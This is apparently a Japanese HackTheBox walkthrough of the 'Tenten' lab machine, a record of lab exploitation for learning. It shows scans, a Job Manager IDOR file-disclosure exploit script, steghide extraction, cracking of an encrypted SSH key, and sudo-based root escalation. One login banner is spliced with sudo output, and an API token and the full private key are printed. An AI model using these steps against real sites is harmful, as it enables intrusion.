はじめに
どうも、忙しくて何から手をつけたらいいかわからない時は全部放置して”日常”をみているikkyuです。
間違っているところとかあればご指摘お願いします。
Tenten
HackTheBox公式より
Tenten is a medium difficulty machine that requires some outside-the-box/CTF-style thinking to
complete. It demonstrates the severity of using outdated Wordpress plugins, which is a major
attack vector that exists in real life.
スキャン
nmap -sC -sV -Pn --script vuln 10.10.10.10 -oA nmap
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-15 07:10 EDT
Nmap scan report for 10.10.10.10
Host is up (0.28s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| vulners:
| cpe:/a:openbsd:openssh:7.2p2:
|_ CVE-2014-9278 4.0 https://vulners.com/cve/CVE-2014-9278
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.10.10.10
| Found the following possible CSRF vulnerabilities:
|
| Path: http://10.10.10.10:80/
| Form id: search-form-5f60a192c20b4
| Form action: http://10.10.10.10/
|
| Path: http://10.10.10.10:80/index.php/jobs/
| Form id:
| Form action: http://10.10.10.10/index.php/jobs/apply/
|
| Path: http://10.10.10.10:80/index.php/category/uncategorized/
| Form id: search-form-5f60a19b8bd84
| Form action: http://10.10.10.10/
|
| Path: http://10.10.10.10:80/wp-login.php
| Form id: loginform
| Form action: http://10.10.10.10/wp-login.php
|
| Path: http://10.10.10.10:80/index.php/2017/04/
| Form id: search-form-5f60a19da5255
| Form action: http://10.10.10.10/
|
| Path: http://10.10.10.10:80/index.php/jobs/%5c%22/
| Form id: search-form-5f60a1a0f0ff4
| Form action: http://10.10.10.10/
|
| Path: http://10.10.10.10:80/index.php/jobs/
| Form id:
| Form action: http://10.10.10.10/index.php/jobs/apply/
|
| Path: http://10.10.10.10:80/index.php/jobs/apply/
| Form id:
|_ Form action:
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
| /wp-login.php: Possible admin folder
| /readme.html: Wordpress version: 2
| /: WordPress version: 4.7.3
| /wp-includes/images/rss.png: Wordpress version 2.2 found.
| /wp-includes/js/jquery/suggest.js: Wordpress version 2.5 found.
| /wp-includes/images/blank.gif: Wordpress version 2.6 found.
| /wp-includes/js/comment-reply.js: Wordpress version 2.7 found.
| /wp-login.php: Wordpress login page.
| /wp-admin/upgrade.php: Wordpress login page.
|_ /readme.html: WordPress version 4.7
| http-fileupload-exploiter:
|
|_ Failed to upload and execute a payload.
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_ http://ha.ckers.org/slowloris/
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-wordpress-users:
| Username found: takis
|_Search stopped at ID #25. Increase the upper limit if necessary with 'http-wordpress-users.limit'
| vulners:
| cpe:/a:apache:http_server:2.4.18:
| CVE-2017-7679 7.5 https://vulners.com/cve/CVE-2017-7679
| CVE-2017-7679 7.5 https://vulners.com/cve/CVE-2017-7679
| CVE-2017-7668 7.5 https://vulners.com/cve/CVE-2017-7668
| CVE-2017-7668 7.5 https://vulners.com/cve/CVE-2017-7668
| CVE-2017-3169 7.5 https://vulners.com/cve/CVE-2017-3169
| CVE-2017-3167 7.5 https://vulners.com/cve/CVE-2017-3167
| CVE-2017-3167 7.5 https://vulners.com/cve/CVE-2017-3167
| CVE-2019-0211 7.2 https://vulners.com/cve/CVE-2019-0211
| CVE-2018-1312 6.8 https://vulners.com/cve/CVE-2018-1312
| CVE-2018-1312 6.8 https://vulners.com/cve/CVE-2018-1312
| CVE-2017-15715 6.8 https://vulners.com/cve/CVE-2017-15715
| CVE-2019-10082 6.4 https://vulners.com/cve/CVE-2019-10082
| CVE-2019-10082 6.4 https://vulners.com/cve/CVE-2019-10082
| CVE-2017-9788 6.4 https://vulners.com/cve/CVE-2017-9788
| CVE-2019-0217 6.0 https://vulners.com/cve/CVE-2019-0217
| CVE-2020-1927 5.8 https://vulners.com/cve/CVE-2020-1927
| CVE-2019-10098 5.8 https://vulners.com/cve/CVE-2019-10098
| CVE-2020-1934 5.0 https://vulners.com/cve/CVE-2020-1934
| CVE-2020-1934 5.0 https://vulners.com/cve/CVE-2020-1934
| CVE-2019-0220 5.0 https://vulners.com/cve/CVE-2019-0220
| CVE-2019-0220 5.0 https://vulners.com/cve/CVE-2019-0220
| CVE-2019-0196 5.0 https://vulners.com/cve/CVE-2019-0196
| CVE-2019-0196 5.0 https://vulners.com/cve/CVE-2019-0196
| CVE-2018-17199 5.0 https://vulners.com/cve/CVE-2018-17199
| CVE-2018-17199 5.0 https://vulners.com/cve/CVE-2018-17199
| CVE-2018-1333 5.0 https://vulners.com/cve/CVE-2018-1333
| CVE-2018-1333 5.0 https://vulners.com/cve/CVE-2018-1333
| CVE-2017-9798 5.0 https://vulners.com/cve/CVE-2017-9798
| CVE-2017-15710 5.0 https://vulners.com/cve/CVE-2017-15710
| CVE-2016-8743 5.0 https://vulners.com/cve/CVE-2016-8743
| CVE-2016-8740 5.0 https://vulners.com/cve/CVE-2016-8740
| CVE-2016-4979 5.0 https://vulners.com/cve/CVE-2016-4979
| CVE-2019-0197 4.9 https://vulners.com/cve/CVE-2019-0197
| CVE-2020-11985 4.3 https://vulners.com/cve/CVE-2020-11985
| CVE-2019-10092 4.3 https://vulners.com/cve/CVE-2019-10092
| CVE-2019-10092 4.3 https://vulners.com/cve/CVE-2019-10092
| CVE-2018-11763 4.3 https://vulners.com/cve/CVE-2018-11763
| CVE-2018-11763 4.3 https://vulners.com/cve/CVE-2018-11763
| CVE-2016-4975 4.3 https://vulners.com/cve/CVE-2016-4975
| CVE-2016-4975 4.3 https://vulners.com/cve/CVE-2016-4975
| CVE-2016-1546 4.3 https://vulners.com/cve/CVE-2016-1546
| CVE-2018-1283 3.5 https://vulners.com/cve/CVE-2018-1283
| CVE-2016-8612 3.3 https://vulners.com/cve/CVE-2016-8612
|_ CVE-2016-8612 3.3 https://vulners.com/cve/CVE-2016-8612
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 360.86 seconds
ブラウザで10.10.10.10にアクセス
ワードプレスで作られたおしゃサイトがでてきます。
wpscan
サイトについて詳しく調べるためにwpscanをします。
wpscan --api-token ************** --url http://10.10.10.10 --enumerate u
tokenはこのサイトを参考に取得できます。
またwpscanについてもここにいろいろ書かれています。
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.6
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://10.10.10.10/ [10.10.10.10]
[+] Started: Wed Sep 16 02:03:28 2020
Interesting Finding(s):
[i] User(s) Identified:
[+] takis
| Found By: Author Posts - Author Pattern (Passive Detection)
| Confirmed By:
| Rss Generator (Passive Detection)
| Wp Json Api (Aggressive Detection)
| - http://10.10.10.10/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] WPVulnDB API OK
| Plan: free
| Requests Done (during the scan): 2
| Requests Remaining: 40
[+] Finished: Wed Sep 16 02:04:01 2020
[+] Requests Done: 57
[+] Cached Requests: 7
[+] Data Sent: 13.198 KB
[+] Data Received: 492.172 KB
[+] Memory used: 115.363 MB
[+] Elapsed time: 00:00:33
出力結果は一部省略していますが、するとtakisというユーザが見つかります。また同様にプラグインについても調べていくと
wpscan --api-token abw0uswfA8iHsk7AG8RpRyOJscCh51KkvtB1cffPBbg --url http://10.10.10.10 --enumerate p
[i] Plugin(s) Identified:
[+] job-manager
| Location: http://10.10.10.10/wp-content/plugins/job-manager/
| Latest Version: 0.7.25 (up to date)
| Last Updated: 2015-08-25T22:44:00.000Z
|
| Found By: Urls In Homepage (Passive Detection)
|
| [!] 1 vulnerability identified:
|
| [!] Title: Job Manager <= 0.7.25 - Insecure Direct Object Reference (IDOR)
| References:
| - https://wpvulndb.com/vulnerabilities/8167
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6668
| - https://vagmour.eu/cve-2015-6668-cv-filename-disclosure-on-job-manager-wordpress-plugin/
|
| Version: 7.2.5 (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://10.10.10.10/wp-content/plugins/job-manager/readme.txt
[+] WPVulnDB API OK
| Plan: free
| Requests Done (during the scan): 1
| Requests Remaining: 39
[+] Finished: Wed Sep 16 02:11:43 2020
[+] Requests Done: 7
[+] Cached Requests: 35
[+] Data Sent: 1.591 KB
[+] Data Received: 38.797 KB
[+] Memory used: 175.387 MB
[+] Elapsed time: 00:00:06
以下のようにJob ManagerでIDORの脆弱性も見つかりました。
[!] Title: Job Manager <= 0.7.25 - Insecure Direct Object Reference (IDOR)
| References:
| - https://wpvulndb.com/vulnerabilities/8167
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6668
| - https://vagmour.eu/cve-2015-6668-cv-filename-disclosure-on-job-manager-wordpress-plugin/
再びウェブサイトに戻ってJobs listingをクリック
Pentersterをクリック、Apply Nowをクリック。
10.10.10.10/index.php/jobs/apply/8/
最後の数字を9や10に変更すると違うページが表示され、ページ左上のJOB APPLICATOIN:のが表示されなかったり別のものに変わっていくことがわかります。ファジング できることに気がつく。JOB APPLICATIOの上で右クリック、Inspect Elementで要素が<h1 class="entry-title">であることを確認してから
for i in $(seq 1 30); do echo -n "$i:"; curl -s http://10.10.10.10/index.php/jobs/apply/$i/ | grep '<h1 class="entry-title">'; done
echoの-nは出力文字の最後を改行しない、curlの-sは進捗状況を表示しないです。
1: <h1 class="entry-title">Job Application: Hello world!</h1> </header><!-- .entry-header -->
2: <h1 class="entry-title">Job Application: Sample Page</h1> </header><!-- .entry-header -->
3: <h1 class="entry-title">Job Application: Auto Draft</h1> </header><!-- .entry-header -->
4: <h1 class="entry-title">Job Application</h1> </header><!-- .entry-header -->
5: <h1 class="entry-title">Job Application: Jobs Listing</h1> </header><!-- .entry-header -->
6: <h1 class="entry-title">Job Application: Job Application</h1> </header><!-- .entry-header -->
7: <h1 class="entry-title">Job Application: Register</h1> </header><!-- .entry-header -->
8: <h1 class="entry-title">Job Application: Pen Tester</h1> </header><!-- .entry-header -->
9: <h1 class="entry-title">Job Application:</h1> </header><!-- .entry-header -->
10: <h1 class="entry-title">Job Application: Application</h1> </header><!-- .entry-header -->
11: <h1 class="entry-title">Job Application: cube</h1> </header><!-- .entry-header -->
12: <h1 class="entry-title">Job Application: Application</h1> </header><!-- .entry-header -->
13: <h1 class="entry-title">Job Application: HackerAccessGranted</h1> </header><!-- .entry-header -->
14: <h1 class="entry-title">Job Application</h1> </header><!-- .entry-header -->
15: <h1 class="entry-title">Job Application</h1> </header><!-- .entry-header -->
16: <h1 class="entry-title">Job Application</h1> </header><!-- .entry-header -->
17: <h1 class="entry-title">Job Application</h1> </header><!-- .entry-header -->
18: <h1 class="entry-title">Job Application</h1> </header><!-- .entry-header -->
19: <h1 class="entry-title">Job Application</h1> </header><!-- .entry-header -->
20: <h1 class="entry-title">Job Application</h1> </header><!-- .entry-header -->
21: <h1 class="entry-title">Job Application</h1> </header><!-- .entry-header -->
22: <h1 class="entry-title">Job Application</h1> </header><!-- .entry-header -->
23: <h1 class="entry-title">Job Application</h1> </header><!-- .entry-header -->
24: <h1 class="entry-title">Job Application</h1> </header><!-- .entry-header -->
25: <h1 class="entry-title">Job Application</h1> </header><!-- .entry-header -->
26: <h1 class="entry-title">Job Application</h1> </header><!-- .entry-header -->
27: <h1 class="entry-title">Job Application</h1> </header><!-- .entry-header -->
28: <h1 class="entry-title">Job Application</h1> </header><!-- .entry-header -->
29: <h1 class="entry-title">Job Application</h1> </header><!-- .entry-header -->
30: <h1 class="entry-title">Job Application</h1> </header><!-- .entry-header -->
13番目にJob Application: HackerAccessGrantedが見つかります。
wpscanでみつけたhttps://vagmour.eu/cve-2015-6668-cv-filename-disclosure-on-job-manager-wordpress-plugin/にあるエクスプロイトコードを使います。コードをexploit.pyとして保存。
これを以下のように改変します。
import requests
website = input('Enter a vulnerable website: ')
filename = input('Enter a file name: ')
filename2 = filename.replace(" ", "-")
for year in range(2013,2019):
for i in range(1,13):
for extension in {'png','jpeg','jpg','doc','pdf','docx'}:
URL = website + "/wp-content/uploads/" + str(year) + "/" + "{:02}".format(i) + "/" + filename2 + "." + extension
req = requests.get(URL)
if req.status_code==200:
print ("[+] URL of CV found! " + URL)
拡張子のリストを追加、raw_inputをinputに変更、print関数の表記変更、for文の範囲の拡張をしています。
実行。
python3 exploit.py
Enter a vulnerable website: http://10.10.10.10
Enter a file name: HackerAccessGranted
[+] URL of CV found! http://10.10.10.10/wp-content/uploads/2017/04/HackerAccessGranted.jpg
HackerAccessGranted.jpgという画像ファイルがみつかったのでダウンロード。
$ wget http://10.10.10.10/wp-content/uploads/2017/04/HackerAccessGranted.jpg
--2020-09-17 20:09:12-- http://10.10.10.10/wp-content/uploads/2017/04/HackerAccessGranted.jpg
Connecting to 10.10.10.10:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 262408 (256K) [image/jpeg]
Saving to: ‘HackerAccessGranted.jpg’
HackerAccessGranted.jpg 100%[==========================================================================================>] 256.26K 38.9KB/s in 6.6s
2020-09-17 20:09:21 (38.9 KB/s) - ‘HackerAccessGranted.jpg’ saved [262408/262408]
ふつうの画像といえばふつうの画像ですが、フードかぶった怪しい人ですね。たぶんステガノ。ということで
$ steghide extract -sf HackerAccessGranted.jpg
Enter passphrase:
wrote extracted data to "id_rsa".
$ ls
exploit.py HackerAccessGranted.jpg id_rsa
1行目の-sfはステゴファイルを指定しています。オプションの詳細はこちら。
$ cat id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,7265FC656C429769E4C1EEFC618E660C
/HXcUBOT3JhzblH7uF9Vh7faa76XHIdr/Ch0pDnJunjdmLS/laq1kulQ3/RF/Vax
tjTzj/V5hBEcL5GcHv3esrODlS0jhML53lAprkpawfbvwbR+XxFIJuz7zLfd/vDo
1KuGrCrRRsipkyae5KiqlC137bmWK9aE/4c5X2yfVTOEeODdW0rAoTzGufWtThZf
K2ny0iTGPndD7LMdm/o5O5As+ChDYFNphV1XDgfDzHgonKMC4iES7Jk8Gz20PJsm
SdWCazF6pIEqhI4NQrnkd8kmKqzkpfWqZDz3+g6f49GYf97aM5TQgTday2oFqoXH
WPhK3Cm0tMGqLZA01+oNuwXS0H53t9FG7GqU31wj7nAGWBpfGodGwedYde4zlOBP
VbNulRMKOkErv/NCiGVRcK6k5Qtdbwforh+6bMjmKE6QvMXbesZtQ0gC9SJZ3lMT
J0IY838HQZgOsSw1jDrxuPV2DUIYFR0W3kQrDVUym0BoxOwOf/MlTxvrC2wvbHqw
AAniuEotb9oaz/Pfau3OO/DVzYkqI99VDX/YBIxd168qqZbXsM9s/aMCdVg7TJ1g
2gxElpV7U9kxil/RNdx5UASFpvFslmOn7CTZ6N44xiatQUHyV1NgpNCyjfEMzXMo
6FtWaVqbGStax1iMRC198Z0cRkX2VoTvTlhQw74rSPGPMEH+OSFksXp7Se/wCDMA
pYZASVxl6oNWQK+pAj5z4WhaBSBEr8ZVmFfykuh4lo7Tsnxa9WNoWXo6X0FSOPMk
tNpBbPPq15+M+dSZaObad9E/MnvBfaSKlvkn4epkB7n0VkO1ssLcecfxi+bWnGPm
KowyqU6iuF28w1J9BtowgnWrUgtlqubmk0wkf+l08ig7koMyT9KfZegR7oF92xE9
4IWDTxfLy75o1DH0Rrm0f77D4HvNC2qQ0dYHkApd1dk4blcb71Fi5WF1B3RruygF
2GSreByXn5g915Ya82uC3O+ST5QBeY2pT8Bk2D6Ikmt6uIlLno0Skr3v9r6JT5J7
L0UtMgdUqf+35+cA70L/wIlP0E04U0aaGpscDg059DL88dzvIhyHg4Tlfd9xWtQS
VxMzURTwEZ43jSxX94PLlwcxzLV6FfRVAKdbi6kACsgVeULiI+yAfPjIIyV0m1kv
5HV/bYJvVatGtmkNuMtuK7NOH8iE7kCDxCnPnPZa0nWoHDk4yd50RlzznkPna74r
Xbo9FdNeLNmER/7GGdQARkpd52Uur08fIJW2wyS1bdgbBgw/G+puFAR8z7ipgj4W
p9LoYqiuxaEbiD5zUzeOtKAKL/nfmzK82zbdPxMrv7TvHUSSWEUC4O9QKiB3amgf
yWMjw3otH+ZLnBmy/fS6IVQ5OnV6rVhQ7+LRKe+qlYidzfp19lIL8UidbsBfWAzB
9Xk0sH5c1NQT6spo/nQM3UNIkkn+a7zKPJmetHsO4Ob3xKLiSpw5f35SRV+rF+mO
vIUE1/YssXMO7TK6iBIXCuuOUtOpGiLxNVRIaJvbGmazLWCSyptk5fJhPLkhuK+J
YoZn9FNAuRiYFL3rw+6qol+KoqzoPJJek6WHRy8OSE+8Dz1ysTLIPB6tGKn7EWnP
-----END RSA PRIVATE KEY-----
id_rsaというプライベートキーがみつかります。よくssh接続するときに使われるやつですね。ただ3行目からもわかるように暗号化されていてパスワードがないと使えないので、まずはパスワードの解読を試みます。
$ python3 /john/ssh2john.py id_rsa > hash
/john/ssh2john.py:103: DeprecationWarning: decodestring() is a deprecated alias since Python 3.1, use decodebytes()
data = base64.decodestring(data)
まずjohnで扱えるようにssh2john.pyでハッシュを作ります。
$ sudo john hash -wordlist=rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 8 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
superpassword (id_rsa)
Warning: Only 1 candidate left, minimum 8 needed for performance.
1g 0:00:00:02 DONE (2020-09-23 14:23) 0.4273g/s 6128Kp/s 6128Kc/s 6128KC/s *7¡Vamos!
Session completed
パスワードがsuperpasswordだと分かりました。読み込み権限を与えていざssh
$ chmod 600 id_rsa
$ ssh -i id_rsa takis@10.10.10.10
Enter passphrase for key 'id_rsa':
Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-62-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
65 packages can be updated.
39 updates are security upda$ sudo -l
Matching Defaults entries for takis on tenten:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User takis may run the following commands on tenten:
(ALL : ALL) ALL
(ALL) NOPASSWD: /bin/fuckin
tes.
Last login: Fri May 5 23:05:36 2017
takisというユーザ名はwpscanしたときに判明したものです。
特権エスカレーション
$ id
uid=1000(takis) gid=1000(takis) groups=1000(takis),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),117(lpadmin),118(sambashare)
sudoグループであることがわかるのでsudoで何ができるか確認してみます。
$ sudo -l
Matching Defaults entries for takis on tenten:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User takis may run the following commands on tenten:
(ALL : ALL) ALL
(ALL) NOPASSWD: /bin/fuckin
パスワード無しで実行できるファイルが見つかりました。さっそく実行。
$ sudo /bin/fuckin
特に反応がないので適当な文字を引数に
takis@tenten:~$ sudo /bin/fuckin aaaaa
/bin/fuckin: line 2: aaaaa: command not found
どうやらコマンドを受け付けているらしいので
takis@tenten:~$ sudo /bin/fuckin whoami
root
管理者権限でコマンドを実行していることがわかります。なので「su -」としてrootになります。
takis@tenten:~$ sudo /bin/fuckin su -
最後にroot.txtを出力して
root@tenten:~# ls
root.txt
root@tenten:~# cat root.txt
おつかれさまです。では。